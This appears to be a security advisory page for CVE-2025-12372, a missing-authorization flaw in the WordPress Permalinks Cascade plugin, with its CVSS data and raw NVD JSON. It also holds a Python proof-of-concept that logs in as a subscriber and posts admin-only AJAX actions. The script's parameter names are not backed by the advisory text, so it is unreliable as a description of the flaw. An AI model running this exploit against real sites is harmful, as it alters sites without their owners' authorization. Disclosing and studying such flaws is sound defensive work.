Security Vulnerability Report
中文
CVE-2025-12372 CVSS 4.3 MEDIUM

CVE-2025-12372

Published: 2025-11-18 09:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Permalinks Cascade plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.2. This is due to the plugin not properly verifying that a user is authorized to perform an action in the handleTPCAdminAjaxRequest function. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized administrative actions such as enabling or disabling automatic pinging settings and modifying page exclusion settings.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Permalinks Cascade插件 <= 2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12372 PoC - Permalinks Cascade Plugin Unauthorized Access # Target: WordPress site with Permalinks Cascade plugin <= 2.2 def exploit_unauthorized_access(target_url, username, password, action='disable_autoping'): """ Exploit missing authorization in handleTPCAdminAjaxRequest function Args: target_url: Base URL of WordPress site username: Valid subscriber-level username password: Password for the user action: Admin action to perform (disable_autoping, enable_autoping, etc.) """ # Setup session session = requests.Session() # Login as subscriber login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } print(f"[*] Logging in as subscriber: {username}") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed!") return False print("[+] Login successful!") # Prepare AJAX request to exploit the vulnerability ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Different actions that can be performed unauthorized actions = { 'disable_autoping': {'tpc_action': 'toggle_autoping', 'autoping_status': '0'}, 'enable_autoping': {'tpc_action': 'toggle_autoping', 'autoping_status': '1'}, 'modify_exclusions': {'tpc_action': 'update_exclusions', 'excluded_pages': '1,2,3'} } if action not in actions: print(f"[-] Unknown action: {action}") return False # Construct exploit payload exploit_data = { 'action': 'handleTPCAdminAjaxRequest', **actions[action] } print(f"[*] Sending exploit request: {action}") response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print(f"[+] Exploit sent successfully!") print(f"[*] Response: {response.text[:200]}") return True else: print(f"[-] Exploit failed with status: {response.status_code}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> [action]") print(f"Actions: disable_autoping, enable_autoping, modify_exclusions") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] act = sys.argv[4] if len(sys.argv) > 4 else 'disable_autoping' exploit_unauthorized_access(target, user, pwd, act)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12372", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:47.920", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Permalinks Cascade plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.2. This is due to the plugin not properly verifying that a user is authorized to perform an action in the handleTPCAdminAjaxRequest function. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized administrative actions such as enabling or disabling automatic pinging settings and modifying page exclusion settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/admin/admin-controller.class.php#L109", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/includes/core.class.php#L36", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c08d420d-d521-4215-9ef7-b5d1c44a19d3?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.